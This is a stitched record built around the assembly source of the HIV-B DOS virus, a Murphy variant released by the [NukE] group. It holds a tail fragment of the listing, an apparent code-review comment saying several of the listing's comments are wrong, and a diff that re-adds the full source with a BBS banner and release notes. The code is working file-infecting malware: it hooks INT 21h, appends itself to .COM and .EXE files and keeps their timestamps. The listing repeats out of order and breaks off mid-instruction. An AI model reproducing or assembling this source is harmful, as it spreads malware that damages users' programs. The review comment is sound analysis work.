DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
MOV AH,62H ; es:[di]
INT 21H ; Get the Program segment
; prefix...so we can infect it
DEC BX
MOV DS,BX
MOV BYTE PTR DS:DATA_15E,5AH
MOV DX,1E4H
XOR AX,AX ; Zero register
PUSH AX
POP DS
MOV AX,ES
SUB AX,10H
MOV ES,AX
CLI ; Disable interrupts
MOV DS:DATA_3E,DX ;
MOV WORD PTR DS:DATA_3E+2,ES
STI ; Enable interrupts
DEC BYTE PTR DS:DATA_14E ;
LOC_46:
POP SI
CMP WORD PTR CS:DATA_42E[SI],5A4DH
JNE LOC_47 ; Jump if not equal
POP DS
MOV AX,CS:DATA_46E[SI]
MOV BX,CS:DATA_45E[SI] ; all this shit is to restore
PUSH CS ; the program and continue
POP CX ; running the original
SUB CX,AX ; program...
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:DATA_44E[SI]
PUSH DS
POP ES
CALL SUB_10
RETF
LOC_47:
POP AX
MOV AX,CS:DATA_42E[SI]
MOV WORD PTR CS:[100H],AX
MOV AX,CS:DATA_43E[SI]
MOV WORD PTR CS:[102H],AX
MOV AX,100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL SUB_10
RETN
SUB_11 ENDP
SEG_A ENDS
END START
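Review bot: Several comments in this disassembly describe something other than what the instructions do, which will mislead anyone using the listing to write a signature or a removal procedure. In `SUB_6` the comment `This Copies the Virus to the COM File...` sits on code that sets DS to 0, saves the dwords at `DATA_5E` (0:90h, the INT 24h vector) and `DATA_1E` (0:4Ch, the INT 13h vector) and writes replacements; `SUB_7` (`same as Sub_6 just copy yourself to the EXE`) writes the saved values back. I would replace them with `; DS=0: save INT 24h (0:90h) and INT 13h (0:4Ch) vectors, install replacements` and `; restore the INT 24h / INT 13h vectors saved by SUB_6`, and rename the equates accordingly (`DATA_3E EQU 84H` is the INT 21h vector). Likewise `Slowly down the System a little` at `LOCLOOP_4` is on a loop that scans for the terminating zero byte before the `.COM`/`.EXE` extension compares. The same listing is repeated in the next file section, which continues past this view.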
+843
@@ -0,0 +1,843 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> HIV Virus Source :
HIV - VIRUS
Created: March 1991
Scan ID: [Murphy]
Origin: Italy ,"Italain Virus Laboratory!"
Sources: Produced by Rock Steady [NukE]
[NukE] Notes: Okay, another VIRUS SOURCE Release from [NukE]! Yup,
~~~~~~~~~~~~~ Anywayz, this Virus cums from the Murphy Virus! So
if you Scan it with SCAN McAfee & Ass. you will see that it will be
detected as the [Murphy] Virus! I got this Virus from Italy from the
"Italian Virus Laboratory!" Mind you this Virus Source is being
released to the public because it's an OLD Virus and is detectable!
and doesn't do any damage to the system! This virus was edited by
me, I removed some bugs inside and produced this SOURCE CODE ONLY!
[NOTE] Of course, this virus is ONLY for STUDYING, to learn on how
virus are made! After the viruses are old its NICE to release them so
people can study em!
HOW THE HIV - VIRUS WORKS
First, I'd like to thanx all those that thanked me for my latest
Virus! (ParaSite Virus)! And I'm glad to say I'll be releasing the
Source Codes to this virus in 6 MONTHS! Hopefully, by that time it
will be Detected by SCAN (McAfee & Ass) and yall will get a chance
to study this Assome Virus made totally from me...
HIV -: This virus Spreads thru coping itself to .EXE and .COM Files!
~~~~~~ You will notice the file gets larger by 1614 Bytes! The Virus
Hooks itself to Interrup 21h and totally system memory will be 1632
Bytes Less. Once the file is resident in Memory it will attach itself
to every file that is runned or opened! The date of the original file
Doesn't not change! All this virus does is Copy itself over and over
again! CleanUp V77+ will get rid of it...or Simple delete all files
Infected with the virus...Anywayz Enjoy...
NOTE: If you want to compile the source, simply look for it in the .TXT files
contained in DATA.EXE in this newsletter package.
DATA_1E EQU 4CH ; Just a Few Data Segments that are
DATA_3E EQU 84H ; Needed for the virus to find some
DATA_5E EQU 90H ; hard core info...
DATA_7E EQU 102H
DATA_8E EQU 106H
DATA_9E EQU 122H
DATA_10E EQU 124H
DATA_11E EQU 15AH
DATA_12E EQU 450H
DATA_13E EQU 462H
DATA_14E EQU 47BH
DATA_15E EQU 0
DATA_16E EQU 1
DATA_17E EQU 2
DATA_18E EQU 6
DATA_42E EQU 0FB2CH
DATA_43E EQU 0FB2EH
DATA_44E EQU 0FB4BH
DATA_45E EQU 0FB4DH
DATA_46E EQU 0FB83H
DATA_47E EQU 0FB8DH
DATA_48E EQU 0FB8FH
DATA_49E EQU 0FB95H
DATA_50E EQU 0FB97H
DATA_51E EQU 0
DATA_52E EQU 2
SEG_A SEGMENT BYTE PUBLIC
ASSUME CS:SEG_A, DS:SEG_A
ORG 100h ; Compile this to a .COM file!
; So the Virus starts at 0100h
HIV PROC FAR
START:
JMP LOC_35
DB 0C3H
DB 23 DUP (0C3H)
DB 61H, 6EH, 74H, 69H, 64H, 65H
DB 62H, 0C3H, 0C3H, 0C3H, 0C3H
DB 'HIV-B Virus - Release 1.1 [NukE]'
DB ' '
copyright DB '(C) Edited by Rock Steady [NukE]'
DB 0, 0
DATA_24 DW 0
DATA_25 DW 0
DATA_26 DW 0
DATA_27 DW 706AH
DATA_28 DD 00000H
DATA_29 DW 0
DATA_30 DW 706AH
DATA_31 DD 00000H
DATA_32 DW 0
DATA_33 DW 706AH
DATA_34 DB 'HIV-B VIRUS - Release 1.1 [NukE]', 0AH, 0DH
DB 'Edited by Rock Steady [NukE]', 0AH, 0DH
DB '(C) 1991 Italian Virus Laboratory', 0AH, 0DH
DB '$'
DB 0E8H, 83H, 3, 3DH, 4DH, 4BH
DB 75H, 9, 55H, 8BH, 0ECH, 83H
DB 66H, 6, 0FEH, 5DH, 0CFH, 80H
DB 0FCH, 4BH, 74H, 12H, 3DH, 0
DB 3DH, 74H, 0DH, 3DH, 0, 6CH
DB 75H, 5, 80H, 0FBH, 0, 74H
DB 3
LOC_1:
JMP LOC_13
LOC_2:
PUSH ES ; Save All Regesters so that when
PUSH DS ; we restore the program it will
PUSH DI ; RUN correctly and hide the fact
PUSH SI ; that any Virii is tampering with
PUSH BP ; the System....
PUSH DX
PUSH CX
PUSH BX
PUSH AX
CALL SUB_6
CALL SUB_7
CMP AX,6C00H
JNE LOC_3 ; Jump if not equal
MOV DX,SI
LOC_3:
MOV CX,80H
MOV SI,DX
LOCLOOP_4:
INC SI ; Slowly down the System a
MOV AL,[SI] ; little.
OR AL,AL ; Zero ?
LOOPNZ LOCLOOP_4 ; Loop if zf=0, cx>0
SUB SI,2
CMP WORD PTR [SI],4D4FH
JE LOC_7 ; Jump if equal
CMP WORD PTR [SI],4558H
JE LOC_6 ; Jump if equal
LOC_5:
JMP SHORT LOC_12 ;
DB 90H
LOC_6:
CMP WORD PTR [SI-2],452EH
JE LOC_8 ; Jump if equal
JMP SHORT LOC_5 ;
LOC_7:
NOP
CMP WORD PTR [SI-2],432EH
JNE LOC_5 ; Jump if not equal
LOC_8:
MOV AX,3D02H
CALL SUB_5
JC LOC_12 ; Jump if carry Set
MOV BX,AX
MOV AX,5700H
CALL SUB_5 ; Initsilize the virus...
MOV CS:DATA_24,CX ; A Basic Start up to check
MOV CS:DATA_25,DX ; The Interrup 21h
MOV AX,4200H
XOR CX,CX
XOR DX,DX
CALL SUB_5
PUSH CS
POP DS
MOV DX,103H
MOV SI,DX
MOV CX,18H
MOV AH,3FH
CALL SUB_5
JC LOC_10 ; Jump if carry Set
CMP WORD PTR [SI],5A4DH
JNE LOC_9 ; Jump if not equal
CALL SUB_1
JMP SHORT LOC_10
LOC_9:
CALL SUB_4
LOC_10:
JC LOC_11 ; Jump if carry Set
MOV AX,5701H
MOV CX,CS:DATA_24
MOV DX,CS:DATA_25
CALL SUB_5
LOC_11:
MOV AH,3EH ; '>'
CALL SUB_5
LOC_12:
CALL SUB_7
POP AX ; A Stealth Procedure to
POP BX ; end the virus and restore
POP CX ; the program! Pup back all
POP DX ; regesters as we found them!
POP BP ; so nothings changed...
POP SI
POP DI
POP DS
POP ES
LOC_13:
JMP CS:DATA_28
DB 0B4H, 2AH, 0CDH, 21H, 0C3H
HIV ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_1 PROC NEAR ; Start of the Virus!
MOV AH,2AH ; Get the Date system Date!
INT 21H ; If its Friday Display the
; message at Data34 and End!
CMP AL,6
JE LOC_15 ; If Friday display message
JNZ LOC_14 ; If not continue infecting
LOC_14: ; and screwing the system!
MOV CX,[SI+16H]
ADD CX,[SI+8]
MOV AX,10H
MUL CX ; dx:ax = reg * ax
ADD AX,[SI+14H]
ADC DX,0
PUSH DX
PUSH AX
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP DX,0
JNE LOC_16 ; Jump if not equal
CMP AX,64EH
JAE LOC_16 ; Jump if above or =
POP AX
POP DX
STC ; Set carry flag
RETN
LOC_15:
MOV DX,OFFSET DATA_34+18H ; Display Message at Data34!
MOV AH,9 ; With New Offset Address in
INT 21H ; memory!
;
POP AX ; Restore all Regesters as if
POP BX ; nothing was changed and exit
POP CX ; virus and run File...
POP DX
POP SI
POP DI
POP BP
POP DS
POP ES
MOV AH,0 ; Exit Virus if your in a .EXE
INT 21H ; File!!!
; Exit virus if your in a .COM
INT 20H ; File!!!
LOC_16:
MOV DI,AX
MOV BP,DX
POP CX
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],0
JE LOC_RET_19 ; Jump if equal
CMP DX,0
JNE LOC_17 ; Jump if not equal
CMP AX,64EH
JNE LOC_17 ; Jump if not equal
STC ; Set carry flag
RETN
LOC_17:
MOV DX,BP
MOV AX,DI
PUSH DX
PUSH AX
ADD AX,64EH
ADC DX,0
MOV CX,200H
DIV CX ; Find out How much System
LES DI,DWORD PTR [SI+2] ; memory is available...
MOV CS:DATA_26,DI ;
MOV CS:DATA_27,ES ; Every so often make the
MOV [SI+2],DX ; system memory small than
CMP DX,0 ; what it already is...
JE LOC_18 ; Screws up the users hehe
INC AX
LOC_18:
MOV [SI+4],AX
POP AX
POP DX
CALL SUB_2
SUB AX,[SI+8]
LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_2 PROC NEAR
MOV CX,4
MOV DI,AX
AND DI,0FH
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill
RCR AX,1 ; Rotate thru carry
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_3 PROC NEAR
MOV AH,40H
MOV CX,64EH
MOV DX,100H
CALL SUB_6
JMP SHORT LOC_24
DB 90H
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_4:
MOV AX,4202H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =
PUSH AX
CMP BYTE PTR [SI],0E9H
JNE LOC_21 ; Jump if not equal
SUB AX,651H
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag
RETN
LOC_21:
CALL SUB_3
JNC LOC_22 ; Jump if carry=0
POP AX
RETN
LOC_22:
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX
SUB AX,3
MOV DX,122H
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H
MOV CS:[SI+1],AX
MOV AH,40H
MOV CX,3
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags
CALL CS:DATA_28
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; This Copies the Virus
MOV CS:DATA_29,AX ; to the COM File...
MOV CS:DATA_30,ES
MOV AX,46AH
MOV DS:DATA_5E,AX
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; Loads 32Bit word..
MOV CS:DATA_32,AX ; get your info needed on
MOV CS:DATA_33,ES ; System...
LES AX,CS:DATA_31
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore regesters!
POP DS ; go back to the file
POP AX ; being executed...
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; same as Sub_6 just copy
MOV DS:DATA_5E,AX ; yourself to the EXE
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
DB 0B0H, 3, 0CFH, 50H, 53H, 51H
DB 52H, 56H, 57H, 55H, 1EH, 6
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH
DB 62H, 4, 0A1H, 50H, 4, 2EH
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H
DB 4, 0A3H, 50H, 4, 2EH, 0A1H
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H
DB 34H, 0, 0E8H, 0B7H, 0, 2EH
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4
DB 0B3H, 2, 0B8H, 2, 9, 0B9H
DB 1, 0, 0CDH, 10H, 2EH, 0A1H
DB 0CEH, 4, 0A3H, 50H, 4, 7
DB 1FH
DB ']_^ZY[X.'
DB 0FFH, 2EH, 0CAH, 4
DATA_36 DW 0
DATA_37 DW 1010H
DATA_39 DB 0
DATA_40 DD 706A0000H
DB 0, 0, 2EH, 0A1H, 0C7H, 4
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH
DB 0F6H, 6, 0C9H, 4, 1, 74H
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH
DB 80H, 36H, 0C9H, 4, 1, 0EBH
DB 0AH
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if >
XOR CS:DATA_39,1
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero
CMP AH,18H
JB LOC_28 ; Jump if below
XOR CS:DATA_39,2
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if >
XOR CS:DATA_39,2
LOC_28:
CMP BYTE PTR CS:DATA_36,20H
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; Get info on type of Video
MOV BH,DS:DATA_13E ; Display the system has...
MOV AH,8
INT 10H ; with ah=functn 08h
; basically fuck the cursur..
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP
DB 50H, 53H, 51H, 52H, 56H, 57H
DB 55H, 1EH, 6, 33H, 0C0H, 50H
DB 1FH, 81H, 3EH, 70H, 0, 6DH
DB 4, 74H, 35H, 0A1H, 6CH, 4
DB 8BH, 16H, 6EH, 4, 0B9H, 0FFH
DB 0FFH, 0F7H, 0F1H, 3DH, 10H, 0
DB 75H, 24H, 0FAH, 8BH, 2EH, 50H
DB 4, 0E8H, 0BEH, 0FFH, 89H, 2EH
DB 50H, 4, 0C4H, 6, 70H, 0
DB 2EH, 0A3H, 0CAH, 4, 2EH, 8CH
DB 6, 0CCH, 4, 0C7H, 6, 70H
DB 0, 6DH, 4, 8CH, 0EH, 72H
DB 0, 0FBH
LOC_34:
POP ES
POP DS ; Restore and get lost...
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_9 PROC NEAR
MOV DX,10H
MUL DX ; dx:ax = reg * ax
RETN
SUB_9 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_10 PROC NEAR
XOR AX,AX ; If if wants to dissamble
XOR BX,BX ; us give him a HARD time...
XOR CX,CX ; By making all into 0
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
XOR DI,DI ; Zero register
XOR BP,BP ; Zero register
RETN
SUB_10 ENDP
LOC_35:
PUSH DS
CALL SUB_11
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
SUB_11 PROC NEAR
MOV AX,4B4DH
INT 21H ; Load and EXEC file...
; be runned...
NOP
JC LOC_36 ; Jump if carry Set
JMP LOC_46
LOC_36:
POP SI
PUSH SI
MOV DI,SI
XOR AX,AX ; Zero register
PUSH AX
POP DS
LES AX,DWORD PTR DS:DATA_1E ; Load 32 bit ptr
MOV CS:DATA_49E[SI],AX ; Move lots of data
MOV CS:DATA_50E[SI],ES ; into CS to infect the file
LES BX,DWORD PTR DS:DATA_3E ; if not infected and shit..
MOV CS:DATA_47E[DI],BX
MOV CS:DATA_48E[DI],ES
MOV AX,DS:DATA_7E
CMP AX,0F000H
JNE LOC_44 ; Jump if not equal
MOV DL,80H
MOV AX,DS:DATA_8E
CMP AX,0F000H
JE LOC_37 ; Jump if equal
CMP AH,0C8H
JB LOC_44 ; Jump if below
CMP AH,0F4H
JAE LOC_44 ; Jump if above or =
TEST AL,7FH
JNZ LOC_44 ; Jump if not zero
MOV DS,AX
CMP WORD PTR DS:DATA_51E,0AA55H
JNE LOC_44 ; Jump if not equal
MOV DL,DS:DATA_52E
LOC_37:
MOV DS,AX
XOR DH,DH ; Zero register
MOV CL,9
SHL DX,CL ; Shift w/zeros fill
MOV CX,DX
XOR SI,SI ; Zero register
LOCLOOP_38:
LODSW ; String [si] to ax
CMP AX,0FA80H
JNE LOC_39 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7380H
JE LOC_40 ; Jump if equal
JNZ LOC_41 ; Jump if not zero
LOC_39:
CMP AX,0C2F6H
JNE LOC_42 ; Jump if not equal
LODSW ; String [si] to ax
CMP AX,7580H
JNE LOC_41 ; Jump if not equal
LOC_40:
INC SI
LODSW ; String [si] to ax
CMP AX,40CDH
JE LOC_43 ; Jump if equal
SUB SI,3
LOC_41:
DEC SI
DEC SI
LOC_42:
DEC SI
LOOP LOCLOOP_38 ; Loop if cx > 0
JMP SHORT LOC_44
LOC_43:
SUB SI,7
MOV CS:DATA_49E[DI],SI
MOV CS:DATA_50E[DI],DS
LOC_44:
MOV AH,62H
INT 21H ; Simple...Get the PSP
; Address (Program segment
MOV ES,BX ; address and but in BX)
MOV AH,49H
INT 21H ; Get the Free memory from
; the system
MOV BX,0FFFFH ; release extra memory blocks
MOV AH,48H
INT 21H ; Allocate the memory
; At BX (# bytes)
SUB BX,66H ; it attaches virus right
NOP ; under the 640k
JC LOC_46
MOV CX,ES ; did it work? If not just
STC ; end the virus...
ADC CX,BX
MOV AH,4AH
INT 21H ; Adjust teh memory block
; size! BX has the # of bytes
MOV BX,65H
STC ; Set carry flag
SBB ES:DATA_17E,BX ; Where to attach itself!
PUSH ES ; under 640K
MOV ES,CX
MOV AH,4AH
INT 21H ; Just change the memory
; allocations! (BX=Btyes Size)
MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:DATA_16E,8 ;Same place under 640k
CALL SUB_9
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL SUB_9
ADD AX,DS:DATA_18E
ADC DX,0
SUB AX,BX
SBB DX,CX
JC LOC_45 ; Jump if carry Set
SUB DS:DATA_18E,AX
LOC_45:
MOV SI,DI
XOR DI,DI ; Zero register
PUSH CS
POP DS
SUB SI,4D7H
MOV CX,64EH
INC CX
REP MOVSB ; Rep when cx >0 Mov [si] to
